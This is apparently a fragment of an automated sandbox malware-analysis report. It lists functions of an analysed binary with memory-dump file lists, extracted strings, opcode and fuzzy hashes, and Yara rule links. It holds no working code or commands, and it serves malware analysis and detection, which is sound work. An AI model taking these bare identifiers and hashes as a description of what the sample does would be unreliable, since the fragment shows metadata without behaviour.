                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                • Opcode ID: af3017d9e5732cc97315a678704442cbb8d3462ad235ccd6c394709f3e47d5d0
                                                                                                                                                • Instruction ID: 04cd93d30a51ed1ba0c1e197f7672e9c97e27c88b083e0b87d9d793939ee041f
                                                                                                                                                • Opcode Fuzzy Hash: af3017d9e5732cc97315a678704442cbb8d3462ad235ccd6c394709f3e47d5d0
                                                                                                                                                • Instruction Fuzzy Hash: DEC092303C9311B1F1300658AC13F0421041313F21F700320F3647C1D08CD17101D61E
                                                                                                                                                Function 00572F10 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 396 572f10-572f65 CoInitialize
                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00572F60
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Initialize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                • Opcode ID: 200299ba503a9854c5b17ace2db0b754924d257cd36a97066c8e7bf78548dfb9
                                                                                                                                                • Instruction ID: a09bb53dce6205d39e53d61a0cb6f5c01449e826f6a39c0659b6eae407a86825
                                                                                                                                                • Opcode Fuzzy Hash: 200299ba503a9854c5b17ace2db0b754924d257cd36a97066c8e7bf78548dfb9
                                                                                                                                                • Instruction Fuzzy Hash: DBF082A5D10B006BD230BA3D9E0B7173DB8A703360F400729ECE18A3C4F620A82D8BD7

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00589510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                                                                                                • API String ID: 0-655414846
                                                                                                                                                • Opcode ID: 5dbf5517decada06cf892ecc8b7e76a4fae157439e397fcb7ba86b587d8a6dde
                                                                                                                                                • Instruction ID: 495945734e6d539f89efad1b4a2a41f1b0df00dc03c9126adfa066961af67194
                                                                                                                                                • Opcode Fuzzy Hash: 5dbf5517decada06cf892ecc8b7e76a4fae157439e397fcb7ba86b587d8a6dde
                                                                                                                                                • Instruction Fuzzy Hash: DEF130B4508381ABD310EF55D881A2BBBF4FB96748F184D1CF8D5AB252E334D908DB96
                                                                                                                                                Function 0058FD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: :$NA_I$m1s3$uvw
                                                                                                                                                • API String ID: 0-3973114637
                                                                                                                                                • Opcode ID: 6dee30b16e9566f99c70a1b7741c2a52e48800688121b34d8939b168b1891c91
                                                                                                                                                • Instruction ID: 28816b65ae459bc4963bfea3bd0e1934a03d72145860f4994d95e4e4b8adfe42
                                                                                                                                                • Opcode Fuzzy Hash: 6dee30b16e9566f99c70a1b7741c2a52e48800688121b34d8939b168b1891c91
                                                                                                                                                • Instruction Fuzzy Hash: 6732BBB0508381DFD741DF28D884A2ABBE5FB9A340F544E1CF5D58B2A2D335E905DB92
                                                                                                                                                Function 00573BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
